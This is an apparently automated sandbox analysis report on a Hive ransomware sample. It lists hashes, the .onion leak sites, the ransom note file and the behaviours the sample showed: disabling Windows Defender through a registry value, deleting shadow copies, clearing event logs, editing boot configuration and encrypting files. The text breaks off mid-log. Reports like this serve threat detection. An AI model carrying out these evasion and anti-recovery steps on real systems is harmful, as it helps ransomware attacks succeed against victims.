Analysis
-
max time kernel
104s -
max time network
12s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
12-01-2022 14:10
Static task
static1
Behavioral task
behavioral1
Sample
a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe
Resource
win10-en-20211208
General
-
Target
a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe
-
Size
3.7MB
-
MD5
aeeee4eadf43fe2e6780bb3dd21b932b
-
SHA1
89c40f8c28476743f954bbcc6e84aa19e969c6fc
-
SHA256
a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357
-
SHA512
748003efc5416ecfef232f83772aa401834d345ef7550a8bafdbfbae8f0d51ec54d84769f4dcb907d6b64ff04bb6335b6f2fe1a3993f80b54ff3d37a55d20ce1
Malware Config
Extracted
C:\Program Files\7-Zip\agQX_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2128 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 2064 bcdedit.exe 2088 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\builtincontrolsschema.xsd.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY00795_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL058.XML.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\LABEL98.POC.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Part\1 Top.accdt.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_floating.png a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\agQX_HOW_TO_DECRYPT.txt a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Bermuda.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile.html.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0285780.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR16F.GIF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\adcvbs.inc a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGZIP.DPV.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\clock.html a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\AFTRNOON\agQX_HOW_TO_DECRYPT.txt a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\1047x576black.png a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\NL.ROGERS.COM.XML.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-2.png a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0295069.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00525_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Foundry.xml.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_m.png a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hebron.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00768_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSGR3FR.LEX.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\LETTHEAD.XML.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-9.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\2d.x3d.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04369_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115866.GIF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\agQX_HOW_TO_DECRYPT.txt a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\navSubpicture.png a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21548_.GIF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR20F.GIF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\gadget.xml a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_divider_left.png a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_foggy.png a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\css\settings.css a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\videowall.png a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105846.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00578_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1036\MSO.ACL.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_off.gif.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files\7-Zip\Lang\ko.txt.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher_1.3.0.v20140911-0143.jar.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152432.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Hardware Tracker.fdt.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\icon.png a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_bottom_right.png a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Metlakatla.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\in_sidebar\bg_sidebar.png a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00538_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.ja_5.5.0.165303.jar.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\ja-JP\gadget.xml a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1124 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 2388 NOTEPAD.EXE -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exea33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exepid process 2160 powershell.exe 2248 powershell.exe 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1836 wevtutil.exe Token: SeBackupPrivilege 1836 wevtutil.exe Token: SeSecurityPrivilege 1780 wevtutil.exe Token: SeBackupPrivilege 1780 wevtutil.exe Token: SeSecurityPrivilege 1792 wevtutil.exe Token: SeBackupPrivilege 1792 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1520 wmic.exe Token: SeSecurityPrivilege 1520 wmic.exe Token: SeTakeOwnershipPrivilege 1520 wmic.exe Token: SeLoadDriverPrivilege 1520 wmic.exe Token: SeSystemProfilePrivilege 1520 wmic.exe Token: SeSystemtimePrivilege 1520 wmic.exe Token: SeProfSingleProcessPrivilege 1520 wmic.exe Token: SeIncBasePriorityPrivilege 1520 wmic.exe Token: SeCreatePagefilePrivilege 1520 wmic.exe Token: SeBackupPrivilege 1520 wmic.exe Token: SeRestorePrivilege 1520 wmic.exe Token: SeShutdownPrivilege 1520 wmic.exe Token: SeDebugPrivilege 1520 wmic.exe Token: SeSystemEnvironmentPrivilege 1520 wmic.exe Token: SeRemoteShutdownPrivilege 1520 wmic.exe Token: SeUndockPrivilege 1520 wmic.exe Token: SeManageVolumePrivilege 1520 wmic.exe Token: 33 1520 wmic.exe Token: 34 1520 wmic.exe Token: 35 1520 wmic.exe Token: SeIncreaseQuotaPrivilege 1104 wmic.exe Token: SeSecurityPrivilege 1104 wmic.exe Token: SeTakeOwnershipPrivilege 1104 wmic.exe Token: SeLoadDriverPrivilege 1104 wmic.exe Token: SeSystemProfilePrivilege 1104 wmic.exe Token: SeSystemtimePrivilege 1104 wmic.exe Token: SeProfSingleProcessPrivilege 1104 wmic.exe Token: SeIncBasePriorityPrivilege 1104 wmic.exe Token: SeCreatePagefilePrivilege 1104 wmic.exe Token: SeBackupPrivilege 1104 wmic.exe Token: SeRestorePrivilege 1104 wmic.exe Token: SeShutdownPrivilege 1104 wmic.exe Token: SeDebugPrivilege 1104 wmic.exe Token: SeSystemEnvironmentPrivilege 1104 wmic.exe Token: SeRemoteShutdownPrivilege 1104 wmic.exe Token: SeUndockPrivilege 1104 wmic.exe Token: SeManageVolumePrivilege 1104 wmic.exe Token: 33 1104 wmic.exe Token: 34 1104 wmic.exe Token: 35 1104 wmic.exe Token: SeIncreaseQuotaPrivilege 1104 wmic.exe Token: SeSecurityPrivilege 1104 wmic.exe Token: SeTakeOwnershipPrivilege 1104 wmic.exe Token: SeLoadDriverPrivilege 1104 wmic.exe Token: SeSystemProfilePrivilege 1104 wmic.exe Token: SeSystemtimePrivilege 1104 wmic.exe Token: SeProfSingleProcessPrivilege 1104 wmic.exe Token: SeIncBasePriorityPrivilege 1104 wmic.exe Token: SeCreatePagefilePrivilege 1104 wmic.exe Token: SeBackupPrivilege 1104 wmic.exe Token: SeRestorePrivilege 1104 wmic.exe Token: SeShutdownPrivilege 1104 wmic.exe Token: SeDebugPrivilege 1104 wmic.exe Token: SeSystemEnvironmentPrivilege 1104 wmic.exe Token: SeRemoteShutdownPrivilege 1104 wmic.exe Token: SeUndockPrivilege 1104 wmic.exe Token: SeManageVolumePrivilege 1104 wmic.exe Token: 33 1104 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1628 wrote to memory of 588 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 1628 wrote to memory of 588 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 1628 wrote to memory of 588 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 588 wrote to memory of 556 588 net.exe net1.exe PID 588 wrote to memory of 556 588 net.exe net1.exe PID 588 wrote to memory of 556 588 net.exe net1.exe PID 1628 wrote to memory of 872 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 1628 wrote to memory of 872 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 1628 wrote to memory of 872 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 872 wrote to memory of 1436 872 net.exe net1.exe PID 872 wrote to memory of 1436 872 net.exe net1.exe PID 872 wrote to memory of 1436 872 net.exe net1.exe PID 1628 wrote to memory of 1644 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 1628 wrote to memory of 1644 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 1628 wrote to memory of 1644 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 1644 wrote to memory of 640 1644 net.exe net1.exe PID 1644 wrote to memory of 640 1644 net.exe net1.exe PID 1644 wrote to memory of 640 1644 net.exe net1.exe PID 1628 wrote to memory of 692 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 1628 wrote to memory of 692 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 1628 wrote to memory of 692 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 692 wrote to memory of 1440 692 net.exe net1.exe PID 692 wrote to memory of 1440 692 net.exe net1.exe PID 692 wrote to memory of 1440 692 net.exe net1.exe PID 1628 wrote to memory of 1544 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 1628 wrote to memory of 1544 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 1628 wrote to memory of 1544 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 1544 wrote to memory of 1156 1544 net.exe net1.exe PID 1544 wrote to memory of 1156 1544 net.exe net1.exe PID 1544 wrote to memory of 1156 1544 net.exe net1.exe PID 1628 wrote to memory of 1100 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 1628 wrote to memory of 1100 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 1628 wrote to memory of 1100 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 1100 wrote to memory of 1060 1100 net.exe net1.exe PID 1100 wrote to memory of 1060 1100 net.exe net1.exe PID 1100 wrote to memory of 1060 1100 net.exe net1.exe PID 1628 wrote to memory of 1280 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 1628 wrote to memory of 1280 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 1628 wrote to memory of 1280 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 1280 wrote to memory of 1496 1280 net.exe net1.exe PID 1280 wrote to memory of 1496 1280 net.exe net1.exe PID 1280 wrote to memory of 1496 1280 net.exe net1.exe PID 1628 wrote to memory of 1172 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 1628 wrote to memory of 1172 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 1628 wrote to memory of 1172 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe net.exe PID 1172 wrote to memory of 1632 1172 net.exe net1.exe PID 1172 wrote to memory of 1632 1172 net.exe net1.exe PID 1172 wrote to memory of 1632 1172 net.exe net1.exe PID 1628 wrote to memory of 1136 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe sc.exe PID 1628 wrote to memory of 1136 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe sc.exe PID 1628 wrote to memory of 1136 1628 